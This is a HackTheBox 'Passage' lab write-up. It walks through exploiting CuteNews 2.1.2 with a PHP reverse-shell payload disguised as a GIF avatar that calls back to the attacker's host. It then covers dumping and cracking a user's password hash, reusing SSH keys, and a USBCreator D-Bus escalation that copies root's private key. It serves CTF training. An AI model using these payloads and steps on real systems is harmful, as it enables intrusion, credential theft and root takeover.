HackTheBox - Passage Writeup
Introduction
Passage is medium level machine, Enumuration is the key for this box. First we have to exploit the cutenews Web application to Get the initial reverse shell after that i found the bunch of php files which contains the user information with base64 format then we get the hash for the user paul and decrypt the hash and i login to to user paul. The user paul and nadav share the ssh keys so i copied the ssh key and Get access to the user nadav after that i found the nadav user in sudo group and .vim info reveal the usefull imformation for getting root this machine In order to root this machine i used the USBCreator D-Bus Privilege Escalation.
Skills Required : Enumuration, Basic linux command
Skills Learned : web Exploitaion, USBCreator D-Bus Privilege Escalation
Enumuration
Nmap scan
the nmap scan show there is 2 port open
22 ssh
80 http
#nmap -sV -sC -oN scan-tcp.nmap 10.10.10.206
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-18 17:32 GMT
Nmap scan report for 10.10.10.206
Host is up (0.040s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
| 256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_ 256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Passage News
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.31 seconds
so the machine run the apache web server. I opened the web page in my browser
CuteNews
web page show the host name and give me the 2 Email address
admin : nadav@passage.htb
paul Colas : paul@passage.htb
I add the passage.htb on my /etc/hosts file.
and the page reveals website is powered by Cutenews after searching on the internet i found the cutenews is the news management based on flat files as a storage.
so after that i searched on the internet for any Exploit available for cutenews ad i looked the page source code i found some interesting information
# Source Page Code
<link href="CuteNews/libs/css/cosmo.min.css" rel="stylesheet">
<link href="CuteNews/libs/css/font-awesome.min.css" rel="stylesheet">
After that i go the directory Cutenews and i found the login page of the cutenews
the login page of the Cutenews show the version of the cutenews is 2.1.2
CuteNews 2.1.2 - Remote Code Execution
so i check for the exploit in exploitdb using the command searchsploit
user@home:~$ searchsploit cutenews 2.1.2
#searchsploit cutenews 2.1.2
----------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------- ---------------------------------
CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit) | php/remote/46698.rb
CuteNews 2.1.2 - Arbitrary File Deletion | php/webapps/48447.txt
CuteNews 2.1.2 - Authenticated Arbitrary File Upload | php/webapps/48458.txt
CuteNews 2.1.2 - Remote Code Execution | php/webapps/48800.py
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
user@home:~$ searchsploit -m php/webapps/48800.py
if you want to run that script its ok but i have to exploit the cutenews manually.
Its simple 3 step process.
- create a user
Register Form
- then click on the personal options
- scroll down you see the upload avatar upload the shell.php
user@home:~$ vim shell.php
GIF8;
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/YOURIP/1234 0>&1'") ?>
save the file and upload.
before open the avatar image you need to create a listener on port 1234 with nc commmand
user@home:~$ nc -lvvnkp 1234 open the avatar image in the browser and i got that shell!
#nc -lvvnkp 1234
listening on [any] 1234 ...
connect to [10.10.14.xx] from (UNKNOWN) [10.10.10.206] 37080
bash: cannot set terminal process group (1635): Inappropriate ioctl for device
bash: no job control in this shell
www-data@passage:/var/www/html/CuteNews/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@passage:/var/www/html/CuteNews/uploads$
Getting User Paul
after some enumuration i found the directory which contains the user information and password hash in base64 format
www-data@passage:/var/www/html/CuteNews/cdata/users$ ls
ls
01.php
09.php
0a.php
16.php
21.php
2a.php
32.php
52.php
5d.php
62.php
66.php
6e.php
77.php
7a.php
81.php
8f.php
97.php
a5.php
b0.php
b1.php
c8.php
d2.php
d4.php
d5.php
d6.php
e0.php
f3.php
fc.php
lines
users.txt
cat 09.php
www-data@passage:/var/www/html/CuteNews/cdata/users$ cat 09.php
cat 09.php
<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO319
Decode the base64
echo base64_text | base64 -d
www-data@passage:/var/www/html/CuteNews/cdata/users$ echo "YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO319" | base64 -d
<Fzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO319" | base64 -d
a:1:{s:5:"email";a:1:{s:16:"paul@passage.htb";s:10:"paul-coles";}}
so i decided to decode all the files i know the base64 is mostly start with “Y” so used the command
www-data@passage:/var/www/html/CuteNews/cdata/users$ grep -rh Y | base64 -d
i got the paul user hash let crack the hash with john
user@home:~$ echo ‘e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd’ > hash john hash –wordlist=/opt/rockyou.txt –format=Raw-SHA256
#john hash --wordlist=/opt/rockyou.txt --format=Raw-SHA256
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 128/128 AVX 4x])
Warning: poor OpenMP scalability for this hash type, consider --fork=2
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
atlanXXX (?)
1g 0:00:00:00 DONE (2021-03-18 18:52) 100.0g/s 1638Kp/s 1638Kc/s 1638KC/s 123456..cocoliso
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed
change the user to paul
python3 -c “import pty;pty.spawn(‘/bin/bash’)”
su paul
www-data@passage:/var/www/html/CuteNews/cdata/users$ python3 -c "import pty;pty.spawn('/bin/bash')"
<tml/CuteNews/cdata/users$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@passage:/var/www/html/CuteNews/cdata/users$ su paul
su paul
Password:
paul@passage:/var/www/html/CuteNews/cdata/users$
Found the user flag at /home/paul/user.txt
paul@passage:~$ pwd
pwd
/home/paul
paul@passage:~$ wc user.txt
wc user.txt
1 1 33 user.txt
Privilage Escalation
after some enumuration i found the interesting only one entry in the auhorization_keys
paul@passage:~/.ssh$ cat authorized_keys
cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzXiscFGV3l9T2gvXOkh9w+BpPnhFv5AOPagArgzWDk9uUq7/4v4kuzso/lAvQIg2gYaEHlDdpqd9gCYA7tg76N5RLbroGqA6Po91Q69PQadLsziJnYumbhClgPLGuBj06YKDktI3bo/H3jxYTXY3kfIUKo3WFnoVZiTmvKLDkAlO/+S2tYQa7wMleSR01pP4VExxPW4xDfbLnnp9zOUVBpdCMHl8lRdgogOQuEadRNRwCdIkmMEY5efV3YsYcwBwc6h/ZB4u8xPyH3yFlBNR7JADkn7ZFnrdvTh3OY+kLEr6FuiSyOEWhcPybkM5hxdL9ge9bWreSfNC1122qq49d nadav@passage
Getting User nadav
then i assume there is a possible that the user paul and nadav have shared SSH keys. so i copied the id_rsa file from the paul.
user@home:~$ chmod 600 nadav.key user@home:~$ ssh -i nadav.key nadav@passage.htb It worked I got the user nadav
chmod 600 nadav.key
ssh -i nadav.key nadav@passage.htb
Last login: Mon Aug 31 15:07:54 2020 from 127.0.0.1
nadav@passage:~$ id
uid=1000(nadav) gid=1000(nadav) groups=1000(nadav),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
nadav@passage:~$
Getting Root
After some enumuration i found the some interesting information from .vim file The vim history indicates that there have been some changes in the files /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf and /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf.
nadav@passage:~$ cat /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
nadav@passage:~$ cat /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
<!DOCTYPE busconfig PUBLIC
"-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN"
"http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd">
<busconfig>
<!-- Only root can own the service -->
<policy user="root">
<allow own="com.ubuntu.USBCreator"/>
</policy>
<!-- Allow anyone to invoke methods (further constrained by
PolicyKit privileges -->
<policy context="default">
<allow send_destination="com.ubuntu.USBCreator"
send_interface="com.ubuntu.USBCreator"/>
<allow send_destination="com.ubuntu.USBCreator"
send_interface="org.freedesktop.DBus.Introspectable"/>
<allow send_destination="com.ubuntu.USBCreator"
send_interface="org.freedesktop.DBus.Properties"/>
</policy>
</busconfig>
nadav@passage:~$ cat /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
nadav@passage:~$ cat /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin
nadav@passage:~$
so i copy the file name and google it. what i understand is the user with sudo group can do the privilage escalation and the user nadav is the sudo group user so i try that command. after that i used the command to get the ssh key of the root user and copied to the /home/nadav/key
gdbus call –system –dest com.ubuntu.USBCreator –object-path /com/ubuntu/USBCreator –method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /home/nadav/key true
nadav@passage:~$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /home/nadav/key true
()
copy the key file to my machine and saved it with name root.key then give the permission
user@home:~$ chmod 600 root.key so let login to the root user…. BOOM
user@home:~$ ssh -i root.key root@passage.htb
#ssh -i root.key root@passage.htb
Last login: Mon Aug 31 15:14:22 2020 from 127.0.0.1
root@passage:~# id
uid=0(root) gid=0(root) groups=0(root)
root@passage:~# wc root.txt
1 1 33 root.txt
root@passage:~#